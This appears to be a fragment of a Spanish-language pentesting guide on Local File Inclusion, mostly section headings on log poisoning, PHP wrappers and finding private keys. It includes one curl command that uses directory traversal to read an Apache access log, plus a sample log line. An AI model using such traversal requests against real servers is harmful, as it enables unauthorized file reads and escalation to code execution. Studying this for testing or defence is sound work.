Local File Inclusion (LFI)
Definición
Impacto
LFI TO RCE via Log Poisoning
Windows: C:\xampp\apache\logs
Linux: /var/log/apache2/access.logcurl https://r4z0r.gitbook.io/index.php?page=../../../../../../../../../var/log/apache2/access.log
Respuesta HTTP:
192.168.50.1 - - [12/Apr/2022:10:34:55 +0000] "GET /index.php?page=admin.php HTTP/1.1" 200 2218 "-""Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0" LFI en Windows:
LFI To RCE - Abusing /proc/self/fd/X + Log Poisoning
Finding private keys
Wrappers PHP
PHP Expect Wrapper
PHP Data Wrapper
PHP Filter Wrapper
PHP Zip Wapper
PHP Phar Wrapper
Recursos
Última actualización